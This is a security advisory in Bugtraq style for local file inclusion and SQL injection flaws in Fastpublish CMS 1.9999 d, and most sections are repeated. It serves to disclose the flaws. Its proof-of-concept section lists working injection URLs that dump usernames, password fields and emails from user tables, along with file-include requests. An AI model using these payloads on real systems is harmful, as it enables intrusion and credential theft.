Fastpublish CMS Local File Include and SQL Injection Vulnerabilities
BID:31582
Info
Fastpublish CMS Local File Include and SQL Injection Vulnerabilities
| Bugtraq ID: | 31582 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-4519 CVE-2008-4518 |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 05 2008 12:00AM |
| Updated: | Jul 05 2016 10:01PM |
| Credit: | ~!Dok_tOR!~ |
| Vulnerable: |
Fastpublish Fashpublish CMS 1.9999 d |
| Not Vulnerable: | |
Discussion
Fastpublish CMS Local File Include and SQL Injection Vulnerabilities
Fastpublish CMS is prone to multiple local file-include and SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit the local file-include vulnerabilities using directory-traversal strings to view local files within the context of the webserver process. Information harvested may aid in further attacks.
The attacker can exploit the SQL-injection vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Fastpublish CMS 1.9999 d is vulnerable; other versions may also be affected.
Fastpublish CMS is prone to multiple local file-include and SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit the local file-include vulnerabilities using directory-traversal strings to view local files within the context of the webserver process. Information harvested may aid in further attacks.
The attacker can exploit the SQL-injection vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Fastpublish CMS 1.9999 d is vulnerable; other versions may also be affected.
Exploit / POC
Fastpublish CMS Local File Include and SQL Injection Vulnerabilities
Attackers can exploit these issues via a browser.
The following example URIs are available:
http://www.example.com/[installdir]/index2.php?q=dok&sprache=-1'+union+select+1,2,3,4,5,concat_ws(0x3a,user_type,user_name,user_pw),7,8,9,10+from+fastpublish__forumen_userdata/*
http://www.example.com/[installdir]/index2.php?q=dok&sprache=-1'+union+select+1,2,3,4,5,concat_ws(0x3a,user_type,user_name,user_pw),7,8,9,10+from+fastpublish__forum_de_userdata/*
http://www.example.com/[installdir]/index2.php?q=dok&sprache=-1'+union+select+1,2,3,4,5,concat_ws(0x3a,benutzer,passwortm,email),7,8,9,10+from+fastpublish_benutzer/*
http://www.example.com/[installdir]/index.php?artikel=-1+union+select+1,2,concat_ws(0x3a,user_type,user_name,user_pw),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+fastpublish__forumen_userdata/*
http://www.example.com/index2.php?artikel=3&target=./[file]
http://www.example.com/index.php?artikel=2&target=./[file]
Attackers can exploit these issues via a browser.
The following example URIs are available:
http://www.example.com/[installdir]/index2.php?q=dok&sprache=-1'+union+select+1,2,3,4,5,concat_ws(0x3a,user_type,user_name,user_pw),7,8,9,10+from+fastpublish__forumen_userdata/*
http://www.example.com/[installdir]/index2.php?q=dok&sprache=-1'+union+select+1,2,3,4,5,concat_ws(0x3a,user_type,user_name,user_pw),7,8,9,10+from+fastpublish__forum_de_userdata/*
http://www.example.com/[installdir]/index2.php?q=dok&sprache=-1'+union+select+1,2,3,4,5,concat_ws(0x3a,benutzer,passwortm,email),7,8,9,10+from+fastpublish_benutzer/*
http://www.example.com/[installdir]/index.php?artikel=-1+union+select+1,2,concat_ws(0x3a,user_type,user_name,user_pw),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+fastpublish__forumen_userdata/*
http://www.example.com/index2.php?artikel=3&target=./[file]
http://www.example.com/index.php?artikel=2&target=./[file]
Solution / Fix
Fastpublish CMS Local File Include and SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Fastpublish CMS Local File Include and SQL Injection Vulnerabilities
References:
References:
- Fastpublish CMS Homepage (Fastpublish)